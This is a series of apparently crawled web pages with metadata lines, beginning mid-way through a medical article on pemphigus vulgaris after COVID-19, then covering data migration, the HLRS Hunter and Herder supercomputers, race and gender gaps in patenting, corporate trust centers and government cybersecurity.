Autoimmune diseases involve abnormal immune responses directed against self-antigens. More than 80 categories of autoimmune disorders exist, and while their etiologies are not fully understood, factors such as genetics, age, environment, and viral infections have been implicated. Notably, prior studies have associated herpesviruses, including cytomegalovirus and varicella zoster virus, with PV.[16,17] The study by Gunardi et al. contributes to this body of knowledge, suggesting a potential link between SARS-CoV-2 infection and the development of PV.[18–21]

Mechanisms of Autoimmunity Triggered by Viruses

The proposed mechanisms of autoimmunity triggered by viruses, including SARS-CoV-2, involve molecular mimicry, bystander activation, and epitope spreading. The high expression of angiotensin-converting enzyme 2 (ACE2) receptors, identified as the key functional receptor for SARS-CoV-2, in skin keratinocytes and the oral mucosa is noteworthy.[22–25] The cases presented by Gunardi et al. indicate a consistent pattern of initial oral lesions followed by skin involvement, aligning with the distribution of ACE2 receptors.

Limitations and Future Directions

While the case series provides valuable insights, limitations exist, primarily stemming from the reliance on medical records for COVID-19 data. The lack of specific information regarding the SARS-CoV-2 variant involved and the medications administered during COVID-19 treatment makes it difficult to pinpoint the factors contributing to PV development.

In conclusion, the discussion surrounding the emergence of oral PV post-COVID-19 infection offers a nuanced exploration of potential connections between viral infections and autoimmune diseases. The presented cases emphasize the importance of heightened vigilance among clinicians regarding the possibility of autoimmune reactions following the COVID-19 pandemic. As researchers continue to unravel the mechanisms underlying PV induced by SARS-CoV-2, further investigations are warranted to elucidate the intricate interplay between viral infections, genetic predispositions, and the onset of autoimmune diseases. The study by Gunardi et al. contributes to the growing body of literature in this field, prompting a call for ongoing research and a deeper understanding of the complex relationships between viral infections and autoimmune pathologies.

Reference link: https://journals.lww.com/jpat/fulltext/2023/27030/the_emerging_concern_of_oral_pemphigus_vulgaris.26.aspx
<urn:uuid:757a5d53-e26f-4bb8-a561-d6ef428f6763>
CC-MAIN-2024-38
https://debuglies.com/2023/12/04/emerging-cases-of-pemphigus-vulgaris-following-covid-19-infection/
2024-09-17T12:17:27Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00224.warc.gz
en
0.900262
1,360
2.734375
3
Data migration is the process of moving data from one system to another. Businesses need to keep their data secure and available throughout such transitions. In this blog, we'll walk through the steps involved in the data migration process and offer suggestions for a smooth procedure. When upgrading systems or switching platforms, a well-run migration ensures that important data isn't lost. By understanding the fundamentals of data migration, businesses can limit disruptions and maintain productivity. Let's get started.

What is data migration and why does it matter?

Data migration is the process of transferring data from one system to another while ensuring its integrity and accessibility in the new environment. This is critical during system upgrades, platform changes, and organizational transitions.

Why does data migration matter? For several reasons:
- Preservation of Data – It ensures that valuable data is preserved and available after the transition to a new system.
- Business Continuity – Data migration permits uninterrupted operations by ensuring that crucial data is available when needed.
- Compliance Requirements – Many industries have strict regulations about data storage and handling. Proper data migration helps businesses comply with these requirements.
- Facilitates Growth – Organizations adopt new technologies and systems as they expand and evolve. Data migration supports this by enabling seamless transitions.

Data migration is not just about moving files; it is about safeguarding the lifeblood of an organization: its data. Now, let's look at the types of data migration.

Types of data migration

Data migration can take diverse forms, depending on a business's specific needs and goals. Here are some of the most common types:
- Storage Migration – Moving data between different storage systems, for example when upgrading hardware or shifting data to cloud storage. It helps consolidate storage infrastructure, ensures data accessibility and scalability, and reduces storage costs.
- Database Migration – Moving data from one database platform to another, or upgrading database software or versions. It consolidates databases for improved efficiency, ensures data integrity and compatibility, and optimizes database performance.
- Application Migration – Transitioning data between software applications, upgrading software versions, or moving to new applications, while ensuring seamless integration with existing systems and minimizing disruption to business operations.
- Cloud Migration – Moving data and applications to cloud-based platforms to leverage cloud infrastructure for scalability and flexibility. It also involves ensuring data protection and regulatory compliance, optimizing cloud resources for cost efficiency, and implementing backup and disaster recovery measures.
- Platform Migration – Transitioning data from one computing platform to another, such as from on-premises to cloud-based systems. It requires ensuring compatibility and interoperability between platforms, testing and validating functionality post-migration, and training users on the new platform to support adoption.

Data migration encompasses various types, each with its own challenges and considerations. Now, let's look at the steps of the data migration process.
What are the various steps of the data migration process?

Data migration is a multi-step process that requires careful planning and execution. Here are the key steps:
- Assessment and Planning – Start by identifying data sources and destinations. Assess data quality and integrity, and define migration goals and objectives. Then develop a migration strategy and timeline, allocate resources, and assign responsibilities accordingly.
- Data Profiling and Cleansing – Profile the data to understand its structure and format, and remove duplicates and inconsistencies. Standardize data formats and naming conventions, and verify data accuracy and completeness while ensuring compliance with regulations.
- Testing and Validation – Conduct test migrations to validate the process, and compare migrated data with source data for accuracy. Test integration with existing systems and verify data integrity and consistency. Address any issues or gaps identified during testing.
- Execution and Migration – Execute the migration according to the defined plan. Monitor migration progress and performance, and ensure data is transferred securely and efficiently. Establish rollback procedures in case of failure, and communicate updates to stakeholders.
- Post-Migration Activities – Verify data completeness and accuracy after migration, and conduct user acceptance testing (UAT) to confirm functionality. Address any post-migration bugs or issues while training and supporting users on the new system.

The data migration process is complex but crucial for organizations. Now let's look at five tools that assist with data migration.

5 best tools that assist in data migration

Here are five database migration tools worth knowing:
- AWS Database Migration Service (DMS) – AWS offers a managed service for migrating databases to the AWS cloud. It supports both homogeneous and heterogeneous migrations, keeps downtime to a minimum, and offers continuous data replication and high availability. DMS is compatible with database engines such as MySQL, Oracle, and SQL Server.
- Microsoft Data Migration Assistant (DMA) – DMA assists in migrating on-premises databases to Microsoft Azure. It provides assessment reports that flag compatibility issues and potential performance improvements, and supports schema and data migration for SQL Server, MySQL, and Oracle. It offers compatibility checks for Azure SQL Database and SQL Server on Azure VMs, and helps upgrade older versions of SQL Server to the latest version.
- Informatica PowerCenter – A comprehensive enterprise data integration platform, PowerCenter supports both batch and real-time data migration. It offers data profiling, cleansing, and transformation capabilities, enables integration with a wide range of data sources and targets, and provides scalability, reliability, and performance optimization features.
- Talend Data Integration – A unified platform for data integration and migration tasks, Talend supports batch, real-time, and big data integration. It offers a graphical interface for designing and executing migration workflows, provides connectors for various databases, cloud platforms, and applications, and enables code generation and deployment for data migration tasks.
- Carbonite Migrate – Carbonite Migrate facilitates seamless migrations across cloud, virtual, and physical environments. It offers automated discovery and assessment of migration requirements, supports near-zero-downtime migrations, provides real-time tracking and reporting of migration progress, and ensures data integrity and security throughout the migration process.

These tools provide a range of features to streamline data migration and deliver effective results for organizations of all sizes. Now, let's look at the challenges of performing data migration.

Is performing data migration challenging?

Performing data migration can certainly be difficult, for several reasons:
- Complexity of Data Structures – Different data sources may have complicated structures, making it hard to map data fields accurately. Transformation rules may vary between systems, so ensuring data integrity and consistency is critical, and dealing with unstructured or semi-structured data adds further complexity.
- Volume and Variety of Data – Large volumes of data require efficient migration techniques, and handling many data types and formats poses challenges. Ensuring data security and compliance is vital, legacy systems and outdated technologies complicate the process, and managing data dependencies and relationships calls for careful planning.
- Downtime and Disruptions – Minimizing downtime during migration is hard, and ensuring business continuity while migrating critical data is essential. Balancing migration speed against data accuracy is a constant trade-off. Unexpected issues or failures can disrupt operations, and coordinating with stakeholders and users adds complexity.
- Resource Allocation and Skill Requirements – Adequate resources and expertise are essential for a successful migration, but finding professionals with data migration experience can take time and effort. Training personnel on new technologies and tools is critical, and balancing ongoing training against daily operations requires careful resource management.
- Regulatory and Compliance Considerations – Compliance with regulatory standards adds complexity to data migration. Ensuring data privacy and protection throughout the migration is critical, and adhering to industry standards and best practices requires careful planning. Documenting migration procedures and maintaining audit trails are essential for compliance; without proper knowledge and careful implementation, an organization can face legal trouble.

Performing data migration is a complex task that calls for careful planning, execution, and management. By understanding the challenges, organizations can better prepare, mitigate risks, and ensure a successful migration. Now, let's look at how to perform data migration well.

What should be the approach to perform data migration well?

To carry out data migration well, it's essential to take a systematic approach. Here's what that looks like:

Assessment and Planning
- Assess data sources, destinations, and requirements.
- Define migration goals, objectives, and success criteria.
- Develop a detailed migration plan with timelines and milestones, allocate resources, and assign responsibilities to team members.
Data Profiling and Cleansing
- Profile data to understand its characteristics, and cleanse it by removing duplicates, inconsistencies, and errors.
- Standardize data formats and naming conventions.
- Verify data accuracy, completeness, and integrity.

Data Mapping and Transformation
- Map data fields and attributes between source and target systems.
- Define transformation rules, logic, and mappings.
- Convert data formats, values, and units, and thoroughly test the mapping and transformation processes.

Testing and Validation
- Test migration processes, and compare migrated data with source data for accuracy and completeness (a minimal validation sketch appears at the end of this post).
- Perform integration testing with existing systems and applications, and verify data integrity, consistency, and reliability.

Execution and Migration
- Execute the migration according to the defined plan and schedule.
- Monitor migration progress, performance, and resource usage. Address any issues, errors, or failures promptly, and keep rollback procedures ready to mitigate risks.

The data migration process is crucial for businesses navigating technological change. By following a systematic approach and leveraging the right tools and strategies, organizations can mitigate risks and ensure a smooth transition to new systems. With careful planning, execution, and post-migration follow-up, organizations can harness the full potential of their data while maintaining productivity and minimizing disruption.
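As a concrete illustration of the testing-and-validation step above, the sketch below compares row counts and content checksums between a source and a target table. It uses two in-memory SQLite databases so it runs as-is; in a real migration the connections, table names, and ordering strategy would differ, and hashing every row this way is only practical for modest data volumes.

```python
import hashlib
import sqlite3

def table_fingerprint(conn, table):
    """Return (row_count, digest) for a table, hashing rows in a stable order.
    Sorting all rows client-side is fine for a sketch but slow at scale."""
    rows = conn.execute(f"SELECT * FROM {table}").fetchall()
    digest = hashlib.sha256()
    for row in sorted(rows):
        digest.update(repr(row).encode("utf-8"))
    return len(rows), digest.hexdigest()

# Hypothetical source and target databases (in-memory for this sketch).
source = sqlite3.connect(":memory:")
target = sqlite3.connect(":memory:")
for db in (source, target):
    db.execute("CREATE TABLE customers (id INTEGER, email TEXT)")
source.executemany("INSERT INTO customers VALUES (?, ?)",
                   [(1, "a@example.com"), (2, "b@example.com")])
# Simulate a migration that silently dropped a row.
target.execute("INSERT INTO customers VALUES (1, 'a@example.com')")

src_count, src_hash = table_fingerprint(source, "customers")
tgt_count, tgt_hash = table_fingerprint(target, "customers")

if (src_count, src_hash) == (tgt_count, tgt_hash):
    print("customers: OK (counts and checksums match)")
else:
    print(f"customers: MISMATCH (source {src_count} rows, target {tgt_count} rows)")
```

A production pipeline would typically push the checksumming into the databases themselves, for example hashing per partition, rather than pulling every row to the client.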
<urn:uuid:130424f9-b07a-4a88-b16f-b2b48be9c7e2>
CC-MAIN-2024-38
https://www.kovair.com/blog/the-comprehensive-guide-to-data-migration-processes/
2024-09-07T20:44:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00224.warc.gz
en
0.895082
2,156
2.6875
3
In the first stage, a transitional supercomputer called Hunter will begin operation in 2025. It will be followed in 2027 by Herder, an exascale system that will significantly expand Germany's high-performance computing (HPC) capabilities. Hunter and Herder will offer researchers world-class infrastructure for simulation, artificial intelligence (AI), and high-performance data analytics (HPDA) to power cutting-edge academic and industrial research in computational engineering and the applied sciences.

The total combined cost for Hunter and Herder is €115 million. Funding will be provided through the Gauss Centre for Supercomputing (GCS), the alliance of Germany's three national supercomputing centers. Half of this funding will come from the German Federal Ministry of Education and Research (BMBF), and the other half from the State of Baden-Württemberg's Ministry of Science, Research, and Arts.

Hunter to Herder: A Two-Step Climb to Exascale

Hunter will replace HLRS's current flagship supercomputer, Hawk. It is conceived as a stepping stone that will enable HLRS's user community to transition to the massively parallel, GPU-accelerated architecture of Herder. Hunter will be based on the HPE Cray EX4000 supercomputer, which is designed to deliver exascale-class performance for large-scale workloads across modeling, simulation, AI, and HPDA. Each of the 136 HPE Cray EX4000 nodes will be equipped with four HPE Slingshot high-performance interconnects. Hunter will also leverage the next generation of Cray ClusterStor, a storage system purpose-engineered to meet the demanding input/output requirements of supercomputers, and the HPE Cray Programming Environment, which offers programmers a comprehensive set of tools for developing, porting, debugging, and tuning applications.

Hunter will raise HLRS's peak performance to 39 petaFLOPS (39 × 10^15 floating-point operations per second), up from the 26 petaFLOPS of its current supercomputer, Hawk. More importantly, it will move away from Hawk's emphasis on CPU processors to make greater use of more energy-efficient GPUs. Hunter will be based on the AMD Instinct MI300A accelerated processing unit (APU), which combines CPU and GPU processors and high-bandwidth memory in a single package. By reducing the physical distance between the different processor types and providing unified memory, the APU enables fast data transfer, strong HPC performance, easy programmability, and high energy efficiency. Compared with Hawk, this is expected to cut the energy required to operate Hunter at peak performance by approximately 80%.

Herder will be designed as an exascale system capable of speeds on the order of one quintillion (10^18) FLOPS, a major leap in power that will open exciting new opportunities for key applications run at HLRS. The final configuration, based on accelerator chips, will be determined by the end of 2025. The combination of CPUs and accelerators in Hunter and Herder will require current users of HLRS's supercomputer to adapt existing code to run efficiently. For this reason, HPE will collaborate with HLRS to support its user community in adapting software to harness the full performance of the new systems.
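The quoted figures imply a large jump in energy efficiency, and the arithmetic below makes that explicit. It is a sketch based only on the numbers in this article (26 versus 39 petaFLOPS, and roughly 80% less energy at peak); absolute power draws are not given here, so only the relative gain can be estimated.

```python
# Relative energy-efficiency gain implied by the figures quoted above.
# Absolute power draws are not published here, so only ratios are computed.
hawk_pflops = 26.0
hunter_pflops = 39.0
energy_fraction = 0.20  # Hunter needs ~20% of Hawk's energy at peak (an ~80% cut)

perf_ratio = hunter_pflops / hawk_pflops        # peak-performance multiplier
efficiency_gain = perf_ratio / energy_fraction  # implied FLOPS-per-joule multiplier

print(f"Peak performance: {perf_ratio:.2f}x Hawk")
print(f"Implied energy efficiency: ~{efficiency_gain:.1f}x Hawk")
```

Taken at face value, the move to the MI300A APUs would deliver roughly 1.5 times the peak performance for a fifth of the energy, on the order of a 7.5-fold gain in FLOPS per joule.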
Supporting Scientific Excellence in Stuttgart, Germany, and Beyond

HLRS's leap to exascale is part of the Gauss Centre for Supercomputing's national strategy for the continuing development of the three GCS centers: the upcoming JUPITER supercomputer at the Jülich Supercomputing Centre will be designed for maximum performance and will be the first exascale system in Europe in 2025, while the Leibniz Supercomputing Centre is planning a system for broad usage in 2026. The focus of HLRS's Hunter and Herder supercomputers will be on computational engineering and industrial applications. Together, these systems are designed to ensure that GCS provides optimized resources of the highest performance class for the entire spectrum of cutting-edge computational research in Germany.

For researchers in Stuttgart, Hunter and Herder will open many new opportunities across a wide range of applications in engineering and the applied sciences. For example, they will enable the design of more fuel-efficient vehicles, more productive wind turbines, and new materials for electronics and other applications. New AI capabilities will create opportunities for manufacturing and offer innovative approaches for making large-scale simulations faster and more energy efficient. The systems will also support research addressing global challenges like climate change, and could provide data analytics resources that help public administration prepare for and manage crisis situations. In addition, Hunter and Herder will be state-of-the-art computing resources for Baden-Württemberg's high-tech engineering community, including the small and medium-sized enterprises that form the backbone of the regional economy.

Petra Olschowski, Baden-Württemberg's Minister of Science, Research, and Arts, said: "High-performance computing means rapid development. As the peak performance of supercomputers grows, they are as crucial for cutting-edge science as for innovative products and processes in key industrial sectors. Baden-Württemberg is both a European leader and internationally competitive in the fields of supercomputing and artificial intelligence. As part of the University of Stuttgart, HLRS thus has a key role to play: it is not just the impressive performance of the supercomputer but also the methodological knowledge that the center has assembled that helps our cutting-edge computational research to achieve breathtaking results, for example in climate protection or for more environmentally sustainable mobility."

"Increasingly it's not just faster hardware but optimal usage of the system that is the greatest performance factor in simulation and artificial intelligence," said Dr. Bastian Koller, general manager of HLRS. "We are particularly excited that we have found a globally leading partner for these topics in Hewlett Packard Enterprise, who together with AMD will open up new horizons of performance for our clients."
<urn:uuid:e6af19f2-0403-463a-aa0d-483364a971ed>
CC-MAIN-2024-38
https://www.hpcwire.com/off-the-wire/hlrs-set-to-introduce-supercomputer-hunter-followed-by-exascale-powerhouse-herder-in-stuttgart/
2024-09-12T14:57:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00724.warc.gz
en
0.906955
1,293
2.640625
3
National myths about inventorship normalize entrenched discrimination in STEM fields.

When President Barack Obama signed the America Invents Act in 2011, he was surrounded by a group of people of diverse ages, genders and races. The speech he delivered about the legislation, which changed the technical requirements for filing a patent, highlighted this diversity by emphasizing that today anyone can become an inventor in the United States.

Despite Obama's optimism about women and people of color inventing and patenting the nation's new and innovative technologies, both groups still lag considerably behind their white male counterparts in being recognized as inventors and owning patents, in the U.S. and globally. Women and people of color possess the same intellectual capacities as their white male counterparts. Yet empirical studies consistently show that patent law overwhelmingly rewards white men for their labor and skill. This is in part because women and people of color join science, technology, engineering and math (STEM) fields in much lower numbers than white men. In 2017, women made up over half of the workforce, but held only 29% of STEM jobs. But even women and people of color who go into STEM fields invent and patent far less often than their white male counterparts. The question is why.

As a researcher who studies race, rhetoric and intellectual property law, I can say that the U.S.'s race and gender invention and patent gap results partly from a failure of imagination. The stories that people tell about invention in the U.S. continue to focus on white men – the Benjamin Franklins, Thomas Edisons and Elon Musks – without affording women and people of color the same larger-than-life status. National myths about inventorship and political barriers to patenting set up women and people of color for failure by normalizing entrenched discrimination even when they join STEM fields.

The Stories We Tell about Inventors

Critical race theorists show how legal terms and everyday narratives can look as if they create a level playing field while allowing implicit bias to thrive. In my new book, "The Color of Creatorship," I look at how intellectual property law has evolved racially over 200 years. Black and brown people are no longer legally prohibited from owning patents and copyrights, as they were in the 1700s and 1800s. However, seemingly colorblind patent and copyright laws continue to practically favor white male inventors and creators by using legal definitions and tests that protect inventions and creations that tend to match Western conceptions and expectations of, for instance, expertise and creativity.

From the now cliché "think outside the box" to Apple's slogan "think different," innovation, a central component of invention, is associated with breaking limits. Yet Americans have largely failed to change the ways that they think and talk about invention itself. Even Obama's speech about the America Invents Act begins by explaining how Thomas Jefferson epitomized the nation's mythic spirit of invention and innovation. Yet Jefferson held the racist view that Black people lacked the capacity to be truly imaginative creators, let alone citizens of the nation. Breaking limits, it turns out, is most often a privilege afforded to white people. The current historical moment, in which facts are negotiable, white nationalism is on the rise and the nation is weathering a pandemic, is an important time to redefine American mythologies of invention.
Celebrating the inventive capacity of women and people of color matters. Recognizing their innovative genius, in films like "Hidden Figures," helps transform what had been marginalized stories into narratives that are central to history.

Obama's reference to Jefferson reinforced powerful, limiting conventional wisdom about invention and innovation. Popular cultural narratives frequently invoke the contributions of white men while erasing those of women and people of color. For example, the History Channel's The Men Who Built America focuses on the inventions and innovations of Cornelius Vanderbilt, John D. Rockefeller, Andrew Carnegie and Henry Ford, business titans who achieved tremendous success via dubious ethics. The show's use of the Great Man theory of inventorship and entrepreneurship leaves out the many women and people of color, including Thomas Jennings, Elijah McCoy, Miriam E. Benjamin and Sarah E. Goode who, as legal scholar Shontavia Johnson shows, not only invented and patented during the same period but, as legal scholar Kara Swanson shows, used their work to lobby for suffrage rights for women and people of color.

Attacking Asian Innovation

America's white-male-centered imaginings of inventorship and patenting extend beyond the nation's borders, in xenophobic pronouncements frequently directed at Asian nations. Apple co-founder Steve Wozniak recently proclaimed: "Success in India is based on studying, having a job … where's the creativity?" Similarly, President Trump claimed to be "protecting the innovations, creations, and inventions that power our country" from Chinese graduate students, who are part of a racial group that has long boosted America's economy, fueled global innovation and offered pandemic assistance.

Refusal to recognize diversity in inventorship is a bipartisan affair. Then-presidential candidate and current President-elect Joseph Biden made a shocking assertion about innovation in China: "I challenge you, name me one innovative project, one innovative change, one innovative product that has come out of China."

Inventing New Ways to Talk about Invention

Racist, sexist and xenophobic inventorship and patenting norms are not immutable facts. They are practices built on exclusionary stories and feelings, transformed into familiar myths, including that of the American dream. These exclusionary stories frequently function as dog whistles that have long been used to fuel white anxieties about people of color and men's anxieties about women. They make it difficult for women and people of color to prove they have the expertise needed to invent and patent. However, as films like "Hidden Figures" emphatically show, it's possible to tell inclusionary stories. I argue that telling them is an ethical act because it ensures that society recognizes the genius of people of all identities – race, gender, nationality, religion, ability, age – in contributing to invention and innovation, current and historical.

Rhetoricians frequently proclaim that "words mean things." This is certainly true when imagining who has the capacity to perform certain tasks, such as inventing and patenting. At a moment in which the U.S. faces threats to democracy, environment and economy, it is more important than ever to invent new ways of talking about invention. People of all identities deserve the opportunities to create and own their innovative solutions for solving the world's most pressing problems.
More importantly, they deserve to be treated as full citizens in the realm of intellectual property and innovation. Anjali Vats is an associate professor of communication and African and African Diaspora studies and associate professor of law (by courtesy) at Boston College.
<urn:uuid:dde178a8-dd05-4275-b943-332f72c7d8b5>
CC-MAIN-2024-38
https://www.nextgov.com/ideas/2020/12/iconic-american-inventor-still-white-male-and-s-obstacle-race-and-gender-inclusion/170580/?oref=ng-next-story
2024-09-17T16:13:24Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651800.83/warc/CC-MAIN-20240917140525-20240917170525-00324.warc.gz
en
0.95072
1,443
3.21875
3
A trust center, also known as a trust portal, security portal, or trust page, is a centralized online resource that provides comprehensive information about an organization's security, privacy, and compliance practices. It serves as a single source of truth for customers, partners, and other stakeholders who want to understand how an organization handles sensitive data and manages its security posture.

The primary purpose of a trust center is to demonstrate transparency and accountability. By offering a clear, accessible repository of information about security and privacy practices, organizations can address concerns proactively and build confidence among their users and potential customers. Trust centers provide answers to common questions about data protection, privacy policies, and security measures. This proactive approach can reduce the workload on customer support teams and demonstrate a commitment to open communication.

For companies that handle sensitive data, a well-designed trust center can be a powerful differentiator in a competitive market. It showcases a commitment to security and privacy that can set an organization apart from less transparent competitors. Many industries are also subject to strict regulatory requirements regarding data protection and privacy. A trust center can help demonstrate compliance with these regulations and provide necessary information to auditors and regulators.

What goes into a trust center? The core components typically include the following.

Security practices. This section should provide a comprehensive overview of the technical and operational controls the organization has in place to protect data. Topics might include:
- Encryption practices for data at rest and in transit
- Access control mechanisms and authentication protocols
- Network security measures, including firewalls and intrusion detection systems
- Physical security protocols for data centers and office locations
- Employee security training and awareness programs

Privacy policy. A clear, comprehensive explanation of how the organization collects, uses, and protects user data is crucial. This section should include:
- Types of data collected and reasons for collection
- How data is used and shared
- User rights regarding their personal data
- Cookie policies and tracking technologies used
- Data retention periods and deletion practices

Compliance and certifications. Details about regulatory standards and industry certifications the organization adheres to are important for building trust. This might include:
- Compliance with regulations like GDPR, CCPA, HIPAA, or PCI DSS
- Industry certifications such as ISO 27001, SOC 2, or FedRAMP
- Results of recent audits or assessments (where appropriate to share)
- Ongoing compliance monitoring and management practices

Data handling. Information about how data is stored, processed, and deleted should be clearly explained. This section might cover:
- Data classification and handling procedures
- Data minimization practices
- Procedures for securely disposing of data when it's no longer needed
- Data localization practices and cross-border data transfers

Incident response. An overview of how the organization prepares for and responds to potential security incidents or data breaches is crucial for building confidence. This section could include:
- An overview of the incident response team and their roles
- Steps taken to detect and respond to security incidents
- Communication protocols in the event of a breach
- Post-incident review and improvement processes

User privacy controls. Information about how users can manage their own privacy settings and exercise their data rights is important.
This section might cover:
- How to access, correct, or delete personal data
- Options for opting out of certain data collection or use practices
- Tools and settings available for users to control their privacy
- The process for submitting data subject access requests

FAQs and resources. A section addressing common questions about security and privacy, as well as additional resources for users who want to learn more. This might include:
- Answers to frequently asked security and privacy questions
- Links to relevant policies and procedures
- A glossary of key terms and concepts
- Educational resources on best practices for personal data protection

Contact information. Clear channels for users to reach out with security or privacy questions or concerns, such as:
- Dedicated email addresses for security and privacy inquiries
- Contact forms for submitting questions or concerns
- Information about the security and privacy teams

The trust center should be easy to navigate, with clear headings and a logical structure. Use plain language and avoid technical jargon where possible. Consider providing multiple formats (e.g., text, infographics, videos) to cater to different learning styles.

A trust center is not a static resource. It should be regularly updated to reflect changes in the organization's practices, new compliance achievements, or evolving security measures. Consider including a "What's New" section to highlight recent updates. Some organizations also include real-time status updates about their systems and services, providing an additional layer of transparency. This could include information about ongoing incidents, planned maintenance, or system performance metrics (a sketch of such a status payload follows below).

Consider the needs and concerns of your specific audience when designing your trust center. A B2B software company might need to provide more technical details than a consumer-focused retail business, for example. Make sure the trust center is easily accessible from your main website and consistent with your overall brand and design guidelines. Consider linking to it from key pages like your homepage, product pages, and sign-up forms. Finally, provide mechanisms for users to give feedback on the trust center itself, and use this feedback to continually improve the content and usability of the resource.
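For the real-time status updates mentioned above, some trust centers expose a machine-readable feed alongside the human-readable page. The sketch below shows one plausible shape for such a payload; the field names and status values are illustrative assumptions, not an industry standard.

```python
# A minimal sketch of a machine-readable trust-center status payload.
# Field names and status values are illustrative assumptions, not a standard.
import json
from datetime import datetime, timezone

status = {
    "updated_at": datetime.now(timezone.utc).isoformat(),
    "overall": "operational",  # e.g. operational | degraded | outage
    "components": [
        {"name": "API", "status": "operational"},
        {"name": "Dashboard", "status": "degraded",
         "note": "Elevated latency; fix in progress"},
    ],
    "planned_maintenance": [
        {"window": "2024-10-01T02:00Z/2024-10-01T04:00Z",
         "summary": "Database upgrade"},
    ],
}

print(json.dumps(status, indent=2))
```

Publishing the same information in both prose and structured form lets customers wire trust-center data into their own monitoring and vendor-review workflows.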
While trust centers offer numerous benefits, there are also challenges to consider. Organizations must carefully weigh what information to share publicly; transparency is important, but it's crucial not to disclose details that could compromise security. Maintaining an accurate and current trust center requires ongoing effort and coordination across multiple teams within an organization. And explaining complex security and privacy concepts in a way that's understandable to a general audience requires a careful balance of detail and simplicity. A trust center is not a one-time project but an ongoing commitment to transparency and trust, and organizations must be prepared to invest resources in maintaining and evolving it over time.

As digital interactions continue to dominate both personal and professional spheres, the role of trust centers in establishing and maintaining digital trust is likely to become increasingly important. We may see developments such as:
- Greater integration of real-time data and analytics
- Use of AI to provide personalized trust information
- Increased standardization of trust center formats across industries
- Integration with emerging technologies like blockchain for verifiable trust claims

A well-designed and maintained trust center is more than just a repository of security and privacy information. It's a powerful tool for building and maintaining trust in an era where data protection is a top concern for many users and businesses. By providing clear, comprehensive, and easily accessible information about their security and privacy practices, organizations can demonstrate their commitment to protecting user data, differentiate themselves in the market, and foster long-term relationships built on trust and transparency.

Use HyperComply's Trust Page to store all your compliance information in one place and demonstrate your organization's security posture to all prospects at once. Book a demo.
<urn:uuid:cb8756d7-ffeb-405a-8fe1-8c03d2b2bfa9>
CC-MAIN-2024-38
https://www.hypercomply.com/blog/what-is-a-trust-page
2024-09-18T22:28:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00224.warc.gz
en
0.91657
1,375
2.6875
3
Today, governments all around the world rely heavily on technology to carry out their daily operations. Everything from applying for an ID to obtaining government benefits is handled by IT. As a result, every government is vulnerable to cybercrime risks such as data leaks and hacking. Here are some reasons why governments are concerned about cybersecurity:

Cybersecurity safeguards national information. Governments around the world, like businesses, store sensitive data on computers and in the cloud. The information could concern national investments, defense plans, citizen identification, or other sensitive topics. Enemies or hackers may attempt to attack government systems in order to gain access to it. Suppose an enemy country obtains defense plans by hacking into a government system: this would jeopardize the country's overall security. Cybersecurity is therefore critical in protecting sensitive national information.

Governments rely on cybersecurity to offer uninterrupted services. The majority of government services are accessible through websites, and every country runs many government-linked websites that keep it functioning smoothly. Attackers may attempt to compromise such important websites in order to disrupt national services. Official business would suffer, parts of the country could grind to a halt, and the economy could take a hit.

National infrastructure is protected by cybersecurity. To provide varied services, governments rely on a great deal of hardware: servers, computers, sensors, CPUs, modems, and more. Even basic services like energy and water depend on IT infrastructure, and parts of the national infrastructure are linked to the internet for data and information exchange. As you might expect, all of this is connected to technology and vulnerable to cyberattacks. Cybersecurity services can help national and local governments prevent breaches and secure national infrastructure.

Cybersecurity is essential to avoid cyberwar. Cyberwarfare is no longer the stuff of science fiction movies. Many countries, and even individuals, have waged digital war on governments around the world; Estonia, Georgia, India, and even the United States are among the casualties. Enemies can hack into government systems to spy on military intelligence, disrupt critical services, or even damage infrastructure. Without effective cybersecurity procedures, governments cannot prevent cyberwar. Cybersecurity also helps protect classified and top-secret data.

What can the government do to strengthen national cybersecurity?

Governments take the lead in enacting strong cybersecurity policies and legislation across the country. They take numerous steps to ensure that enemies or hackers cannot complete their dangerous missions, including:
- Including more cybersecurity professionals in government decision-making
- Establishing dedicated cybersecurity centers
- Owning data centers to avoid data breaches and snooping
- Raising awareness among citizens and government employees
- Conducting regular cybersecurity audits to identify security flaws
- Setting up phone numbers or websites for reporting cybercrime
- Developing emergency crisis-management plans
- Appointing executives to oversee national cybersecurity initiatives
- Educating staff and stakeholders on cybersecurity best practices

Governments also devise rapid counter-cybercrime strategies as circumstances demand. Using strong encryption, for example, helps secure national data against espionage.

Our federal, state, and municipal governments all rely on information technology to run their operations. Consider how much effort would be required to mail out social security checks without the power and speed of today's computers, or the time, effort, and labor required to process annual tax returns. And this is nothing compared to the many other roles information technology plays in our government.

The Military and Information Technology

The United States has the most formidable military force in the world for a reason, and that reason is technology. Information technology lets the military communicate swiftly and effectively anywhere in the world, and it allows for rapid analysis and dissemination of data. Cutting-edge information technology also allows all branches of the military to design weapons and other equipment more effectively, and to keep a constant eye on their adversaries.

Government Information Technology at the State Level

In California, for example, one of the largest and most populous states, information technology is one of the most significant aspects of the state's infrastructure. The state spends over a billion dollars per year on IT, and many of the state's functions would be impossible to deliver without it. The state IT department's current responsibilities include assisting in the construction of highway systems, regulating traffic, and delivering virtually real-time background checks and criminal-history data to local, county, and state police officers. The IT industry employs thousands of people in the state.

Information technology's importance in storing and retrieving all types of records cannot be overstated. With the latest storage techniques, records can be retrieved in seconds, then modified, saved, and stored again almost instantly. Keeping records current, with all the necessary information, can save millions of dollars each year.

Information Technology at the Local Government Level

Local government IT is just as vital as federal and state government IT. Information technology is also employed in capital planning, accounting, payroll, inventory management, and many other disciplines. Most towns and cities now have their own websites where residents and tourists can find information on city services and seek assistance with specific needs.

What are the benefits of a national cybersecurity defense strategy?

Governments all over the world have recognized the dangers that cybercrime poses to a country, and they have realized that fighting cybercrime without a well-thought-out approach is impossible. As a result, more than 100 countries have worked to develop national cybersecurity defense strategies. A strategy gives a country's cybersecurity efforts and initiatives structure: it establishes the benchmark that a government must meet or exceed in order to disarm hackers and attackers. Instead of relying on reactive measures, governments have a plan to follow.
